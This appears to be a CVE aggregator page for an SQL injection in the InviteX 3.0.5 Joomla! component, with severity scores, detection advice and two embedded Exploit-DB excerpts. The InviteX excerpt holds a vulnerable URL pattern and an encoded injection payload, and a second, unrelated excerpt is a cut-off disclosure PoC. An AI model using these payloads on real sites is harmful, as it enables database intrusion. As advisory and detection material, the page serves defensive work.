CVE-2018-6394
published 2018-02-17CVE-2018-6394: SQL Injection exists in the InviteX 3.0.5 component for Joomla! via the invite_type parameter in a view=invites action.
PriorityP264critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.70%
84.1th percentile
SQL Injection exists in the InviteX 3.0.5 component for Joomla! via the invite_type parameter in a view=invites action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| techjoomla | invitex | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1↗
- →Monitor HTTP requests targeting the Joomla component 'com_invitex' with the parameter 'view=invites' and a potentially malicious 'invite_type' parameter value (e.g., containing SQL metacharacters or encoded payloads). ↗
- →Alert on requests containing both 'option=com_invitex' and 'view=invites' query parameters, especially when 'invite_type' contains URL-encoded SQL injection sequences or unusual characters. ↗
- →The exploit payload is Base64-encoded in the PoC; decode and inspect 'invite_type' values that are URL-encoded or Base64-encoded for embedded SQL injection strings such as UNION SELECT or CONCAT_WS. ↗
- ·The vulnerable component is specifically InviteX version 3.0.5 for Joomla!; ensure WAF/IDS rules are scoped to this component path and version to avoid false positives on other Joomla components. ↗
- ·The PoC URL uses 'localhost' as a placeholder; in real-world attacks the host will vary. Detection rules should match on the query string parameters (option=com_invitex, view=invites, invite_type) regardless of host. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mongo Web Admin 6.0 - Information Disclosure
exploitdb·2018-11-05
Mongo Web Admin 6.0 - Information Disclosure
Mongo Web Admin 6.0 - Information Disclosure
---
# Exploit Title: Mongo Web Admin 6.0 - Information Disclosure
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mongoadmin.org/
# Software Link: https://netix.dl.sourceforge.net/project/mongo-web-admin/mongoDesktopAdminSetup-beta-6.exe
# Version: 6.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Status/Protocol/Local host/Local port/Remote host/Remote port/PID/Process name
# Established/TCP/127.0.0.1/6376/127.0.0.1/6393/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6376/127.0.0.1/6394/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6393/127.0.0.1/6376/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6394/127.0.0.1/6376/4520/mongoDesktopAdmin
GET /test.
Exploit-DB
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
exploitdb·2018-02-16·CVSS 9.8
CVE-2018-6394 [CRITICAL] Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
---
# # # #
# Exploit Title: Joomla! Component InviteX 3.0.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/content-sharing/bookmark-a-recommend/invitex/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6394
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1
#
# JTJkJTM4JTM3JTM3JTM4JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJ
No writeups or analysis indexed.
2018-02-17
Published